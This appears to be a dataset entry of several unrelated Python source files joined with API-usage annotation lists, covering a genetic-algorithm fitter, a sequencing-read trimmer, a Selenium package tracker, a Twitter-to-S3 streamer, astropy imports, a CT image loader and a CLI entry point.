return np.mean((stacked_y - y_hat) ** 2)
def _calculate_least_difference(self):
sorted_powers = np.sort(self.powers)
return np.min(sorted_powers[1:] - sorted_powers[:-1])
def _calculate_fitness(self, x, y, adjacency_matrix):
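        # fitness favors a low-MSE fit while rewarding well-separated exponents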
mse = self._calculate_mse(x, y, adjacency_matrix)
least_difference = self._calculate_least_difference()
return least_difference / mse
class Population:
def __init__(self, size, x, y, adjacency_matrix):
self.size = size
self.x = x
self.y = y
self.adjacency_matrix = adjacency_matrix
self.individuals = self._initialize_individuals()
def _initialize_individuals(self):
individuals = []
for i in range(self.size):
individuals.append(Individual(
[random.randint(0, 1) for _ in range(CHROMOSOME_SIZE * GENE_SIZE)],
self.x,
self.y,
self.adjacency_matrix
))
return individuals
def _crossover(self, individual1, individual2):
crossover_point = random.randint(0, CHROMOSOME_SIZE * GENE_SIZE - 1)
offspring_chromosome = individual1.chromosome[:crossover_point] + individual2.chromosome[crossover_point:]
return Individual(offspring_chromosome, self.x, self.y, self.adjacency_matrix)
def _mutation(self, individual):
mutated_chromosome = []
for i in range(CHROMOSOME_SIZE * GENE_SIZE):
if random.random() < MUTATION_CHANCE:
mutated_chromosome.append(0 if individual.chromosome[i] else 1)
else:
mutated_chromosome.append(individual.chromosome[i])
return Individual(mutated_chromosome, self.x, self.y, self.adjacency_matrix)
@staticmethod
def _select_random_individual(sorted_individuals, total_fitness):
random_value = random.random()
selected_index = 0
selected_individual = sorted_individuals[0]
sum_fitness = selected_individual.fitness
for i in range(1, len(sorted_individuals)):
if sum_fitness / total_fitness > random_value:
break
selected_index = i
selected_individual = sorted_individuals[i]
sum_fitness += selected_individual.fitness
return selected_index, selected_individual
def run_single_iteration(self):
# the following two values are pre-calculated to increase performance
sorted_individuals = sorted(self.individuals, key=lambda individual: -1 * individual.fitness)
total_fitness = sum([individual.fitness for individual in self.individuals])
children = []
while len(children) < CHILDREN:
individual1_index, individual1 = self._select_random_individual(sorted_individuals, total_fitness)
individual2_index, individual2 = self._select_random_individual(sorted_individuals, total_fitness)
if individual1_index != individual2_index:
children.append(self._mutation(self._crossover(individual1, individual2)))
new_individuals = sorted(self.individuals + children, key=lambda individual: -1 * individual.fitness)
self.individuals = new_individuals[:self.size]
return self.individuals[0] # fittest
def _get_adjacency_matrix():
a = np.zeros((NUMBER_OF_NODES, NUMBER_OF_NODES))
for i in range(NUMBER_OF_NODES):
for j in range(NUMBER_OF_NODES):
if i != j:
a[i, j] = random.random()
return a
def _get_x(adjacency_matrix, time_frames):
x = np.zeros((time_frames + 1, NUMBER_OF_NODES))
x[0] = np.array(
[1 + random.random() * 10 for _ in range(NUMBER_OF_NODES)]
) # NOTE: values must be large enough and different
for i in range(1, time_frames + 1):
for j in range(NUMBER_OF_NODES):
f_result = -1 * (x[i - 1, j] ** 1.5)
g_result = 0
for k in range(NUMBER_OF_NODES):
if k != j:
g_result += adjacency_matrix[k, j] * (x[i - 1, j] ** 0.5) * (x[i - 1, k] ** 0.5)
derivative = f_result + g_result
x[i, j] = x[i - 1, j] + DELTA_T * derivative
return x
def _get_y(x):
x_dot = (x[1:] - x[:len(x) - 1]) / DELTA_T
return x_dot
def run():
adjacency_matrix = _get_adjacency_matrix()
x = _get_x(adjacency_matrix, TIME_FRAMES)
y = _get_y(x)
population = Population(POPULATION, x, y, adjacency_matrix)
fittest_individual = None
for i in range(ITERATIONS):
fittest_individual = population.run_single_iteration()
if i % 1000 == 0:
print(1 / fittest_individual.fitness)
print('%f + %f * xi^%f + %f * sum Aij * xi^%f * xj^%f' % (
fittest_individual.coefficients[0],
fittest_individual.coefficients[1],
fittest_individual.powers[0],
fittest_individual.coefficients[2],
fittest_individual.powers[1],
fittest_individual.powers[2]
))
if __name__ == '__main__':
run()
| [
"numpy.mean",
"numpy.ones",
"numpy.sort",
"numpy.column_stack",
"numpy.sum",
"numpy.zeros",
"numpy.matmul",
"numpy.concatenate",
"numpy.min",
"numpy.linalg.lstsq",
"random.random",
"random.randint"
] | [((5681, 5725), 'numpy.zeros', 'np.zeros', (['(NUMBER_OF_NODES, NUMBER_OF_NODES)'], {}), '((NUMBER_OF_NODES, NUMBER_OF_NODES))\n', (5689, 5725), True, 'import numpy as np\n'), ((5935, 5979), 'numpy.zeros', 'np.zeros', (['(time_frames + 1, NUMBER_OF_NODES)'], {}), '((time_frames + 1, NUMBER_OF_NODES))\n', (5943, 5979), True, 'import numpy as np\n'), ((1624, 1650), 'numpy.concatenate', 'np.concatenate', (['theta_list'], {}), '(theta_list)\n', (1638, 1650), True, 'import numpy as np\n'), ((2308, 2340), 'numpy.matmul', 'np.matmul', (['theta', 'coefficients.T'], {}), '(theta, coefficients.T)\n', (2317, 2340), True, 'import numpy as np\n'), ((2356, 2389), 'numpy.mean', 'np.mean', (['((stacked_y - y_hat) ** 2)'], {}), '((stacked_y - y_hat) ** 2)\n', (2363, 2389), True, 'import numpy as np\n'), ((2458, 2478), 'numpy.sort', 'np.sort', (['self.powers'], {}), '(self.powers)\n', (2465, 2478), True, 'import numpy as np\n'), ((2494, 2540), 'numpy.min', 'np.min', (['(sorted_powers[1:] - sorted_powers[:-1])'], {}), '(sorted_powers[1:] - sorted_powers[:-1])\n', (2500, 2540), True, 'import numpy as np\n'), ((3436, 3486), 'random.randint', 'random.randint', (['(0)', '(CHROMOSOME_SIZE * GENE_SIZE - 1)'], {}), '(0, CHROMOSOME_SIZE * GENE_SIZE - 1)\n', (3450, 3486), False, 'import random\n'), ((4225, 4240), 'random.random', 'random.random', ([], {}), '()\n', (4238, 4240), False, 'import random\n'), ((1543, 1571), 'numpy.column_stack', 'np.column_stack', (['column_list'], {}), '(column_list)\n', (1558, 1571), True, 'import numpy as np\n'), ((2202, 2247), 'numpy.linalg.lstsq', 'np.linalg.lstsq', (['theta', 'stacked_y'], {'rcond': 'None'}), '(theta, stacked_y, rcond=None)\n', (2217, 2247), True, 'import numpy as np\n'), ((1012, 1032), 'numpy.ones', 'np.ones', (['TIME_FRAMES'], {}), '(TIME_FRAMES)\n', (1019, 1032), True, 'import numpy as np\n'), ((1458, 1479), 'numpy.sum', 'np.sum', (['terms'], {'axis': '(0)'}), '(terms, axis=0)\n', (1464, 1479), True, 'import numpy as np\n'), ((3827, 3842), 'random.random', 'random.random', ([], {}), '()\n', (3840, 3842), False, 'import random\n'), ((5853, 5868), 'random.random', 'random.random', ([], {}), '()\n', (5866, 5868), False, 'import random\n'), ((6014, 6029), 'random.random', 'random.random', ([], {}), '()\n', (6027, 6029), False, 'import random\n'), ((3162, 3182), 'random.randint', 'random.randint', (['(0)', '(1)'], {}), '(0, 1)\n', (3176, 3182), False, 'import random\n')] |
def trim_paired_seqs(seq1, qual1, seq2, qual2, read_len):
    ''' Trim off Mirror-seq filled-in nucleotides. For read 1, trim off the last
three nucleotides if they are CGA. For read 2, trim off the first two nucleotides.
Parameters
----------
seq1 : str
The read 1 sequence.
qual1 : str
The quality scores of the read 1 sequence.
seq2 : str
The read 2 sequence.
qual2 : str
The quality scores of the read 2 sequence.
read_len : int
        The original read length from the sequencer.
Returns
-------
str
The trimmed read 1 sequence.
str
        The trimmed read 1 quality score.
str
The trimmed read 2 sequence.
str
        The trimmed read 2 quality score.
'''
if not seq1 or not qual1:
raise Exception('seq1 and qual1 are both required.')
if (seq2==None) ^ (qual2==None):
        raise Exception('seq2 and qual2 must be provided together.')
if len(seq1)<=read_len and seq1.endswith('CGA'):
seq1 = seq1[:-3]
qual1 = qual1[:-3]
if seq2 and qual2:
seq2 = seq2[2:]
qual2 = qual2[2:]
return seq1, qual1, seq2, qual2
def filled_in_paired_end_trimming(read1_filename, read2_filename, out_read1_filename,
out_read2_filename, read_len):
''' Trim off filled-in nucleotides from read1 and read 2 files.
Parameters
----------
read1_filename : str
The read 1 filename in Fastq format with or without gzipped.
read2_filename : str
The read 2 filename in Fastq format with or without gzipped.
out_read1_filename : str
The read 1 output filename.
out_read2_filename : str
The read 2 output filename.
read_len : int
The orignal read length from sequencer.
'''
import pysam
import os
import gzip
import subprocess
fastq_file1 = pysam.FastxFile(read1_filename)
if out_read1_filename.endswith('.gz'):
fw1 = open(out_read1_filename[:-3], 'w')
else:
fw1 = open(out_read1_filename, 'w')
fastq_file2 = None
fw2 = None
if read2_filename:
fastq_file2 = pysam.FastxFile(read2_filename)
if out_read2_filename.endswith('.gz'):
fw2 = open(out_read2_filename[:-3], 'w')
else:
fw2 = open(out_read2_filename, 'w')
for i, read1 in enumerate(fastq_file1):
if i and i%1000000==0:
print('{} reads processed'.format(i))
if fastq_file2:
            read2 = next(fastq_file2)
read2_sequence = read2.sequence
read2_quality = read2.quality
else:
read2 = None
read2_sequence = None
read2_quality = None
seq1, qual1, seq2, qual2 = trim_paired_seqs(read1.sequence, read1.quality,
read2_sequence, read2_quality, read_len)
read_name_str1 = ' '.join([read1.name, read1.comment])
fw1.write('@{}\n{}\n+\n{}\n'.format(read_name_str1, seq1, qual1))
if seq2:
read_name_str2 = ' '.join([read2.name, read2.comment])
fw2.write('@{}\n{}\n+\n{}\n'.format(read_name_str2, seq2, qual2))
fw1.close()
fastq_file1.close()
if fw2:
fw2.close()
fastq_file2.close()
if out_read1_filename.endswith('.gz'):
print('Gziping the files')
subprocess.check_call(('gzip', '-f', fw1.name))
if out_read2_filename:
subprocess.check_call(('gzip', '-f', fw2.name))
def run_trim_galore(read1_filename, read2_filename, out_dir, adapter1, adapter2):
''' Run Trim galore!
Parameters
----------
read1_filename : str
The read 1 filename in Fastq format with or without gzipped.
read2_filename : str
The read 2 filename in Fastq format with or without gzipped.
out_dir : str
The output directory.
adapter1 : str
The adapter of read 1.
adapter2 : str
The adapter of read 2.
'''
import subprocess
cmd = [
'trim_galore',
'-o', out_dir,
'-a', adapter1
]
if read2_filename:
if adapter2:
cmd += ['-a2', adapter2]
cmd += [
'--paired',
read1_filename,
read2_filename,
]
else:
cmd += [read1_filename]
subprocess.check_output(cmd)
def main(read1_filename, read2_filename, out_dir, no_adapter_trimming, read_len,
adapter1, adapter2):
''' Run the entire trimming.
read1_filename : str
The read 1 filename in Fastq format with or without gzipped.
read2_filename : str
The read 2 filename in Fastq format with or without gzipped.
out_dir : str
The output directory.
no_adapter_trimming : bool
If set, do not run Trim galore!.
read_len : int
        The original read length from the sequencer.
adapter1 : str
The adapter of read 1.
adapter2 : str
The adapter of read 2.
'''
import subprocess
import os
is_gzipped = read1_filename.endswith('.gz')
out_filename_template = os.path.join(out_dir, '{}_trimmed.fastq')
if is_gzipped:
prefix1 = os.path.splitext(os.path.splitext(read1_filename)[0])[0]
prefix2 = os.path.splitext(os.path.splitext(read2_filename)[0])[0]
out_filename_template += '.gz'
else:
prefix1 = os.path.splitext(read1_filename)[0]
prefix2 = os.path.splitext(read2_filename)[0]
prefix1 = os.path.basename(prefix1)
prefix2 = os.path.basename(prefix2)
out_read1_filename = out_filename_template.format(prefix1)
out_read2_filename = out_filename_template.format(prefix2)
# Trim_galore
if not no_adapter_trimming:
run_trim_galore(read1_filename, read2_filename, out_dir, adapter1, adapter2)
if is_gzipped:
read1_filename = os.path.join(out_dir,
'{}_val_1.fq.gz'.format(os.path.basename(
os.path.splitext(os.path.splitext(read1_filename)[0])[0]
)))
read2_filename = os.path.join(out_dir,
'{}_val_2.fq.gz'.format(os.path.basename(
os.path.splitext(os.path.splitext(read2_filename)[0])[0]
)))
else:
read1_filename = os.path.join(out_dir,
'{}_val_1.fq'.format(os.path.basename(os.path.splitext(read1_filename)[0])))
read2_filename = os.path.join(out_dir,
'{}_val_2.fq'.format(os.path.basename(os.path.splitext(read2_filename)[0])))
# Fill-in trimming.
filled_in_paired_end_trimming(read1_filename, read2_filename, out_read1_filename,
out_read2_filename, read_len)
print('done!')
def find_read_len(filename):
''' Use the first read to determine read length.
Parameters
----------
filename : str
The read Fastq filename.
Returns
-------
int
Read length.
'''
import os
import pysam
fastq_file = pysam.FastxFile(filename)
    read = next(fastq_file)
fastq_file.close()
return len(read.sequence)
| [
"subprocess.check_output",
"pysam.FastxFile",
"subprocess.check_call",
"os.path.join",
"os.path.splitext",
"os.path.basename"
] | [((1875, 1906), 'pysam.FastxFile', 'pysam.FastxFile', (['read1_filename'], {}), '(read1_filename)\n', (1890, 1906), False, 'import pysam\n'), ((4307, 4335), 'subprocess.check_output', 'subprocess.check_output', (['cmd'], {}), '(cmd)\n', (4330, 4335), False, 'import subprocess\n'), ((5073, 5114), 'os.path.join', 'os.path.join', (['out_dir', '"""{}_trimmed.fastq"""'], {}), "(out_dir, '{}_trimmed.fastq')\n", (5085, 5114), False, 'import os\n'), ((5455, 5480), 'os.path.basename', 'os.path.basename', (['prefix1'], {}), '(prefix1)\n', (5471, 5480), False, 'import os\n'), ((5495, 5520), 'os.path.basename', 'os.path.basename', (['prefix2'], {}), '(prefix2)\n', (5511, 5520), False, 'import os\n'), ((6963, 6988), 'pysam.FastxFile', 'pysam.FastxFile', (['filename'], {}), '(filename)\n', (6978, 6988), False, 'import pysam\n'), ((2137, 2168), 'pysam.FastxFile', 'pysam.FastxFile', (['read2_filename'], {}), '(read2_filename)\n', (2152, 2168), False, 'import pysam\n'), ((3338, 3385), 'subprocess.check_call', 'subprocess.check_call', (["('gzip', '-f', fw1.name)"], {}), "(('gzip', '-f', fw1.name))\n", (3359, 3385), False, 'import subprocess\n'), ((3429, 3476), 'subprocess.check_call', 'subprocess.check_call', (["('gzip', '-f', fw2.name)"], {}), "(('gzip', '-f', fw2.name))\n", (3450, 3476), False, 'import subprocess\n'), ((5351, 5383), 'os.path.splitext', 'os.path.splitext', (['read1_filename'], {}), '(read1_filename)\n', (5367, 5383), False, 'import os\n'), ((5405, 5437), 'os.path.splitext', 'os.path.splitext', (['read2_filename'], {}), '(read2_filename)\n', (5421, 5437), False, 'import os\n'), ((5169, 5201), 'os.path.splitext', 'os.path.splitext', (['read1_filename'], {}), '(read1_filename)\n', (5185, 5201), False, 'import os\n'), ((5244, 5276), 'os.path.splitext', 'os.path.splitext', (['read2_filename'], {}), '(read2_filename)\n', (5260, 5276), False, 'import os\n'), ((6336, 6368), 'os.path.splitext', 'os.path.splitext', (['read1_filename'], {}), '(read1_filename)\n', (6352, 6368), False, 'import os\n'), ((6480, 6512), 'os.path.splitext', 'os.path.splitext', (['read2_filename'], {}), '(read2_filename)\n', (6496, 6512), False, 'import os\n'), ((5951, 5983), 'os.path.splitext', 'os.path.splitext', (['read1_filename'], {}), '(read1_filename)\n', (5967, 5983), False, 'import os\n'), ((6157, 6189), 'os.path.splitext', 'os.path.splitext', (['read2_filename'], {}), '(read2_filename)\n', (6173, 6189), False, 'import os\n')] |
#!/usr/bin/env python
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support.expected_conditions import presence_of_element_located
import time
import os
from os.path import expanduser
import os.path
trackinglist = []
finaltrackinglist = []
path = (expanduser("~")+"/.package-track/bin")
with open("./trackingnumbers.txt", "r") as fileHandle:
for line in fileHandle:
current = line[:-1]
trackinglist.append(current)
for number in trackinglist:
# creating boolean flag to track if package was delivered
delivered = False
#printing tracking number
print(number)
#selenium
#runs in background
    driver = None  # placeholder; a real WebDriver is assigned below
try:
fireFoxOptions = webdriver.FirefoxOptions()
fireFoxOptions.set_headless()
driver = webdriver.Firefox(firefox_options=fireFoxOptions)
except:
chrome_options = Options()
chrome_options.add_argument("--headless")
driver = webdriver.Chrome(chrome_options=chrome_options)
driver.get("https://www.packagetrackr.com")
#print(driver.title)
#importing tracking list from csv
search = driver.find_element_by_name("n")
search.send_keys(number)
search.send_keys(Keys.ENTER)
time.sleep(5)
#waiting for new page to load
results = driver.find_elements_by_class_name("media-body")
for result in results:
# trying to remove listed number if item was delivered
if ("Delivered" in result.text):
delivered = True
# writing contents to new temp file
with open ('./tempfile.txt', 'w') as filehandle:
for result in results:
if ("WE KNOW WHERE YOUR STUFF IS." in result.text):
continue
filehandle.write('%s\n' % result.text)
# comparing the results of old and new files if old file exists
# returning difference to provide most accurate (recent) tracking info
try:
oldfile = open("./"+(number)+'.txt', "r+")
tempfile = open("./tempfile.txt", "r+")
old_dict = oldfile.readlines()
new_dict = tempfile.readlines()
oldfile.close()
tempfile.close()
#finding the difference between the two files
diff = [ x for x in new_dict if x not in old_dict ]
if diff:
print(diff[0].rstrip())
old_dict = new_dict
with open ("./"+(number)+'.txt', "w") as filehandle:
for line in old_dict:
filehandle.write('%s\n' % line.rstrip())
# if older version of the file isn't found, create it based on temp file
except:
with open("./"+(number)+'.txt', "w") as filehandle:
for result in results:
if ("WE KNOW WHERE YOUR STUFF IS." in result.text):
continue
filehandle.write('%s\n' % result.text)
print(result)
if (delivered):
print("package " + number + " was delivered, tracking number removed from list")
try:
os.remove("./"+ (number)+'.txt')
except:
pass
    else:
        finaltrackinglist.append(number)
#updating tracking list txt file
with open ('./trackingnumbers.txt', 'w') as filehandle:
for item in finaltrackinglist:
filehandle.write('%s\n' % item)
#removing tempfile
try:
os.remove("./tempfile.txt")
os.remove("./tracking_from_email.txt")
except:
pass
#print("program complete!")
| [
"selenium.webdriver.chrome.options.Options",
"selenium.webdriver.Chrome",
"selenium.webdriver.Firefox",
"time.sleep",
"selenium.webdriver.FirefoxOptions",
"os.path.expanduser",
"os.remove"
] | [((461, 476), 'os.path.expanduser', 'expanduser', (['"""~"""'], {}), "('~')\n", (471, 476), False, 'from os.path import expanduser\n'), ((1431, 1444), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (1441, 1444), False, 'import time\n'), ((3508, 3535), 'os.remove', 'os.remove', (['"""./tempfile.txt"""'], {}), "('./tempfile.txt')\n", (3517, 3535), False, 'import os\n'), ((3540, 3578), 'os.remove', 'os.remove', (['"""./tracking_from_email.txt"""'], {}), "('./tracking_from_email.txt')\n", (3549, 3578), False, 'import os\n'), ((911, 937), 'selenium.webdriver.FirefoxOptions', 'webdriver.FirefoxOptions', ([], {}), '()\n', (935, 937), False, 'from selenium import webdriver\n'), ((993, 1042), 'selenium.webdriver.Firefox', 'webdriver.Firefox', ([], {'firefox_options': 'fireFoxOptions'}), '(firefox_options=fireFoxOptions)\n', (1010, 1042), False, 'from selenium import webdriver\n'), ((1080, 1089), 'selenium.webdriver.chrome.options.Options', 'Options', ([], {}), '()\n', (1087, 1089), False, 'from selenium.webdriver.chrome.options import Options\n'), ((1157, 1204), 'selenium.webdriver.Chrome', 'webdriver.Chrome', ([], {'chrome_options': 'chrome_options'}), '(chrome_options=chrome_options)\n', (1173, 1204), False, 'from selenium import webdriver\n'), ((3208, 3241), 'os.remove', 'os.remove', (["('./' + number + '.txt')"], {}), "('./' + number + '.txt')\n", (3217, 3241), False, 'import os\n')] |
"""
Creates a tweet stream using the geo coordinates of the latest
earthquake and uploads the tweets to an S3 bucket. If the latest
earthquake occurred in Alaska, 'Not Available' is uploaded instead.
"""
import ast
import csv
import time
import boto3
import tweepy
import random
import json
class MyStreamListener(tweepy.StreamListener):
"""Modifies tweepy and the tweet stream functionality. Creates
csv file and saves the tweets to the file. Also, has a time limit
feature that closes the stream after time has elapsed."""
def __init__(self, time_limit: int):
"""
:param time_limit: int, seconds
"""
self.start_time = time.time()
self.limit = time_limit
self.saveFile = open('yourpath.csv', 'w', encoding='utf-8')
self._csv_writer = csv.writer(self.saveFile)
self._csv_writer.writerow(['Tweets', 'Coordinates'])
super(MyStreamListener, self).__init__()
def on_status(self, status):
print(status.text)
self._csv_writer.writerow([status.text, status.coordinates])
if self.check_time() is False:
return False
    def check_time(self):
        # Returns False once the time limit has elapsed, None otherwise;
        # on_status() checks explicitly for False.
        if time.time() > (self.start_time + self.limit):
            return False
@property
def get_tweet_file(self):
return self.saveFile
def file_close(self):
self.saveFile.close()
def fetch_coordinates():
"""Fetches earthquake coordinates from s3 bucket. Coordinates
are returned as a list."""
cli = boto3.client('s3')
coordinate_object = cli.get_object(Bucket='xxx',
Key='<KEY>')
filedata = coordinate_object['Body'].read()
filedata = json.loads(filedata)
coordinates = ast.literal_eval(filedata['coordinate'])
return coordinates
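# Illustrative sketch (not part of the original module): tweepy's ``locations``
# filter expects a flat bounding box, longitude first, i.e.
# [sw_lon, sw_lat, ne_lon, ne_lat]; the values below are hypothetical:
#   >>> coords = fetch_coordinates()   # e.g. [-122.75, 36.8, -121.75, 37.8]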
def tweets_to_s3():
"""Uploads the tweet.csv file to the S3 Bucket"""
cli = boto3.client('s3')
cli.upload_file('yourpath.csv', Bucket='xxx',
Key='xxx.csv')
def alaska_check():
"""Retrieves json file containing the earthquake data. If Alaska is
is in 'city' True is returned. False is returned otherwise. """
cli = boto3.client('s3')
city_object = cli.get_object(Bucket='xxx',
Key='xxx.json')
filedata = city_object['Body'].read()
filedata = json.loads(filedata)
city = filedata['city']
if 'Alaska' in city:
return True
else:
return False
def main(event, context):
if alaska_check() is True:
saveFile = open('xxx', 'w', encoding='utf-8')
csv_writer = csv.writer(saveFile)
csv_writer.writerow(['Tweets'])
csv_writer.writerow(['Not Available in Area'])
saveFile.close()
tweets_to_s3()
else:
coordinates = fetch_coordinates()
auth = tweepy.OAuthHandler(consumer_key='xxx',
consumer_secret='xxx')
auth.set_access_token('xxx',
'xxx')
api = tweepy.API(auth)
try:
api.verify_credentials()
print('Okay')
except:
print("Credentials don't work")
tweet_stream = MyStreamListener(5)
myStream = tweepy.Stream(auth=api.auth, listener=tweet_stream)
print(myStream.filter(locations=coordinates))
tweet_stream.file_close()
tweets_to_s3()
    print("Done!")
main('d','d')
| [
"json.loads",
"boto3.client",
"tweepy.Stream",
"csv.writer",
"ast.literal_eval",
"tweepy.API",
"time.time",
"tweepy.OAuthHandler"
] | [((1514, 1532), 'boto3.client', 'boto3.client', (['"""s3"""'], {}), "('s3')\n", (1526, 1532), False, 'import boto3\n'), ((1701, 1721), 'json.loads', 'json.loads', (['filedata'], {}), '(filedata)\n', (1711, 1721), False, 'import json\n'), ((1740, 1780), 'ast.literal_eval', 'ast.literal_eval', (["filedata['coordinate']"], {}), "(filedata['coordinate'])\n", (1756, 1780), False, 'import ast\n'), ((1890, 1908), 'boto3.client', 'boto3.client', (['"""s3"""'], {}), "('s3')\n", (1902, 1908), False, 'import boto3\n'), ((2166, 2184), 'boto3.client', 'boto3.client', (['"""s3"""'], {}), "('s3')\n", (2178, 2184), False, 'import boto3\n'), ((2344, 2364), 'json.loads', 'json.loads', (['filedata'], {}), '(filedata)\n', (2354, 2364), False, 'import json\n'), ((671, 682), 'time.time', 'time.time', ([], {}), '()\n', (680, 682), False, 'import time\n'), ((810, 835), 'csv.writer', 'csv.writer', (['self.saveFile'], {}), '(self.saveFile)\n', (820, 835), False, 'import csv\n'), ((2603, 2623), 'csv.writer', 'csv.writer', (['saveFile'], {}), '(saveFile)\n', (2613, 2623), False, 'import csv\n'), ((2834, 2896), 'tweepy.OAuthHandler', 'tweepy.OAuthHandler', ([], {'consumer_key': '"""xxx"""', 'consumer_secret': '"""xxx"""'}), "(consumer_key='xxx', consumer_secret='xxx')\n", (2853, 2896), False, 'import tweepy\n'), ((3020, 3036), 'tweepy.API', 'tweepy.API', (['auth'], {}), '(auth)\n', (3030, 3036), False, 'import tweepy\n'), ((3235, 3286), 'tweepy.Stream', 'tweepy.Stream', ([], {'auth': 'api.auth', 'listener': 'tweet_stream'}), '(auth=api.auth, listener=tweet_stream)\n', (3248, 3286), False, 'import tweepy\n'), ((1178, 1189), 'time.time', 'time.time', ([], {}), '()\n', (1187, 1189), False, 'import time\n')] |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""Astropy FLRW classes."""
from . import base, lambdacdm, w0cdm, w0wacdm, w0wzcdm, wpwazpcdm
from .base import * # noqa: F401, F403
from .lambdacdm import * # noqa: F401, F403
from .w0cdm import * # noqa: F401, F403
from .w0wacdm import * # noqa: F401, F403
from .w0wzcdm import * # noqa: F401, F403
from .wpwazpcdm import * # noqa: F401, F403
__all__ = (base.__all__ + lambdacdm.__all__ + w0cdm.__all__
+ w0wacdm.__all__ + wpwazpcdm.__all__ + w0wzcdm.__all__)
def __getattr__(attr):
"""Lazy import deprecated private API."""
base_attrs = ("H0units_to_invs", "a_B_c2", "critdens_const", "kB_evK",
"radian_in_arcmin", "radian_in_arcsec", "sec_to_Gyr")
if attr in base_attrs + ("quad", ) + ("ellipkinc", "hyp2f1"):
import warnings
from astropy.utils.exceptions import AstropyDeprecationWarning
from . import base, lambdacdm
msg = (f"`astropy.cosmology.flrw.{attr}` is a private variable (since "
"v5.1) and in future will raise an exception.")
warnings.warn(msg, AstropyDeprecationWarning)
if attr in base_attrs:
return getattr(base, "_" + attr)
elif attr == "quad":
return getattr(base, attr)
elif attr in ("ellipkinc", "hyp2f1"):
return getattr(lambdacdm, attr)
raise AttributeError(f"module {__name__!r} has no attribute {attr!r}.")
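# Illustrative sketch (not part of the original file): accessing one of the
# deprecated private names goes through the module-level __getattr__ above,
# which warns and then returns the underlying object, e.g.:
#   >>> from astropy.cosmology import flrw
#   >>> flrw.quad     # emits AstropyDeprecationWarning, returns the private base attribute
#   >>> flrw.hyp2f1   # emits AstropyDeprecationWarning, returns the lambdacdm attribute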
| [
"warnings.warn"
] | [((1118, 1163), 'warnings.warn', 'warnings.warn', (['msg', 'AstropyDeprecationWarning'], {}), '(msg, AstropyDeprecationWarning)\n', (1131, 1163), False, 'import warnings\n')] |
import nrrd
import nibabel as nib
import numpy as np
import pandas as pd
from algorithm.config import *
def load_img_dataset():
img_list = os.listdir(DATA_IMG_EXTENSION_PATH)
try:
img_list.remove('.DS_Store')
except:
print('Linux OS')
print('img file count: ', len(img_list))
pid_list = list(map(lambda x: x.split('-')[0], img_list))
df_img = pd.DataFrame({'pid': pid_list, 'file': img_list})
df_img = df_img.groupby(by=['pid'], axis=0, as_index=False).agg(['count', lambda x: ', '.join(x)])
df_img_valid = df_img[df_img['file']['count'] == 4]
df_img_invalid = df_img[df_img['file']['count'] != 4]
print('pid with 4 files: ', len(df_img_valid))
# df_img_invalid.to_csv('./error_img.csv', index=True)
return {'valid': df_img_valid, 'invalid': df_img_invalid}
def load_trg_label_dataset():
df_label = pd.read_excel(TRG_LABEL_PATH)
# filter invalid rows
df_label = df_label[df_label['wrong'].isna()]
df_label = df_label[-df_label['TRG'].isna()]
df_label = df_label[df_label['verify'] == 4]
df_label = df_label[['pid', 'TRG']]
# sort
df_label = df_label.sort_values(by=['pid'], axis=0)
return df_label
def load_os_label_dataset():
df_label = pd.read_excel(SURVIVAL_LABEL_PATH)
df_label = df_label.dropna()
# convert to 0/1
    df_label['label'] = (df_label['survive'] == '是').astype(int)  # '是' means "yes"
df_label = df_label.drop(['survive'], axis=1)
# sort
df_label = df_label.sort_values(by=['pid'], axis=0)
return df_label
def load_ct_data(ct_id):
# load .nii image
try:
path = os.path.join(DATA_IMG_EXTENSION_PATH, ct_id + '.nii')
nib_object = nib.load(path)
image_data = nib_object.get_data()
# https://nipy.org/nibabel/coordinate_systems.html
scale_x = abs(nib_object.affine[0,0])
scale_y = abs(nib_object.affine[1,1])
assert(scale_x == scale_y)
scale_xy = scale_x
# permute axis and normalize ct scan
image_data = image_data.transpose(2, 0, 1)
image_data = normalize_ct(image_data)
return image_data, scale_xy
except:
pass
# load .nrrd image
try:
path = os.path.join(DATA_IMG_EXTENSION_PATH, ct_id + '.nrrd')
nrrd_object = nrrd.read(path)
image_data = np.array(nrrd_object[0])
spacing = nrrd_object[1]['space directions']
scale_x = abs(spacing[0,0])
scale_y = abs(spacing[1,1])
assert(scale_x == scale_y)
scale_xy = scale_x
print('Load through nrrd image by nrrd: ' + ct_id)
return image_data, scale_xy
except:
pass
raise ValueError({
'message': ERROR_IMAGE_OPEN,
'data': ct_id
})
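# Illustrative usage sketch (not part of the original module); the CT id is
# hypothetical and must match a .nii or .nrrd file in DATA_IMG_EXTENSION_PATH:
#   >>> image_data, scale_xy = load_ct_data('P001-arterial')
#   >>> # scale_xy is the in-plane pixel spacing in the image's spatial units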
def normalize_ct(image_data, normalize=False):
# set out of scan range from -3024 to -1024
image_data[image_data == -3024] = -1024
if normalize:
image_data = image_data / 1024 + 1
return image_data
| [
"nibabel.load",
"nrrd.read",
"numpy.array",
"pandas.read_excel",
"pandas.DataFrame"
] | [((388, 437), 'pandas.DataFrame', 'pd.DataFrame', (["{'pid': pid_list, 'file': img_list}"], {}), "({'pid': pid_list, 'file': img_list})\n", (400, 437), True, 'import pandas as pd\n'), ((877, 906), 'pandas.read_excel', 'pd.read_excel', (['TRG_LABEL_PATH'], {}), '(TRG_LABEL_PATH)\n', (890, 906), True, 'import pandas as pd\n'), ((1257, 1291), 'pandas.read_excel', 'pd.read_excel', (['SURVIVAL_LABEL_PATH'], {}), '(SURVIVAL_LABEL_PATH)\n', (1270, 1291), True, 'import pandas as pd\n'), ((1708, 1722), 'nibabel.load', 'nib.load', (['path'], {}), '(path)\n', (1716, 1722), True, 'import nibabel as nib\n'), ((2318, 2333), 'nrrd.read', 'nrrd.read', (['path'], {}), '(path)\n', (2327, 2333), False, 'import nrrd\n'), ((2355, 2379), 'numpy.array', 'np.array', (['nrrd_object[0]'], {}), '(nrrd_object[0])\n', (2363, 2379), True, 'import numpy as np\n')] |
# coding=utf-8
"""Módulo principal del programa.
La ejecución del programa debe comenzar en este módulo.
La función main() toma los argumentos ingresados, verifica la
configuración y ejecuta el módulo de configuración o el de inicio
de sesión según sea el caso.
"""
import argparse
from .config import config, is_configured
from .login import login
def main(args):
"""Función principal del programa."""
if args['config'] or not is_configured():
config()
else:
login()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Sistema CRUD de campus UMC.')
parser.add_argument('--config', action='store_true',
help='Configura la conexión a MySQL')
